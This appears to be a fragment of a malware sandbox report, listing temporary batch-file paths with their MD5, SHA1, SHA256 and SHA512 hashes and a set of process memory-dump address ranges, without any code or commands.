C:\Users\Admin\AppData\Local\Temp\tmp4CB9.tmp.bat

MD5 121adb655b15d61edb68c6aec1338f4c
SHA1 566f7484dba722bd9ae966499bcd2a92a166f67b
SHA256 65dfcdc48db56cd0fa7d546d0620fa0e770b91e25dc00fcb1331088826099d31
SHA512 2ff911374fd156d4e393ad8ba0ebbbb98304811938cd95020bcf5cd87da46b887a3dec689c71d906b48beb75ecac93f40ab4968207e3a10ec72f755b30fe610f

memory/2996-216-0x0000000000D60000-0x0000000000D78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp70DC.tmp.bat

MD5 fff772dfe52350a0576232e55e59805c
SHA1 996a55cbd20553b8f76738f97015bf4e895b103a
SHA256 3d2e03b56acffcb63e7b16dc459e79d42d3952030bf5304cfbac5dd157642f22
SHA512 bcba2c71c0ab582fe8f7b75dd0c80c731d8db0359c5ab99a61273ee1891fc045c2f89191ca22432012816f19a857c1e86d419f78100a34639296062247a2e6af

C:\Users\Admin\AppData\Local\Temp\tmp8057.tmp.bat

MD5 8cd26c9c3263815cc0949f451630698c
SHA1 7d660f5cca2f941b4820db50dc284aa5763a1627
SHA256 6ed1435eb5cc7fcef98ae7f663c10f3d4496babcea6cc655b69c13e9b1c3ba21
SHA512 463bde66a2250dfdd5cbe96c554ed35ba320aa619fa3736a6d41aedb2b0b6d337c2f215b7017cc2ad56ee58cde4e3f99410f3f44e3954b5d02b10a9ae6d893de

memory/788-350-0x00000000008D0000-0x00000000008E8000-memory.dmp

memory/2328-781-0x0000000070FD0000-0x0000000071248000-memory.dmp

memory/2328-783-0x00000000713D0000-0x0000000071431000-memory.dmp

memory/2328-785-0x0000000002C90000-0x00000000038DA000-memory.dmp

memory/2328-784-0x0000000073EC0000-0x0000000073EEE000-memory.dmp

memory/2328-782-0x0000000073EF0000-0x0000000073F1F000-memory.dmp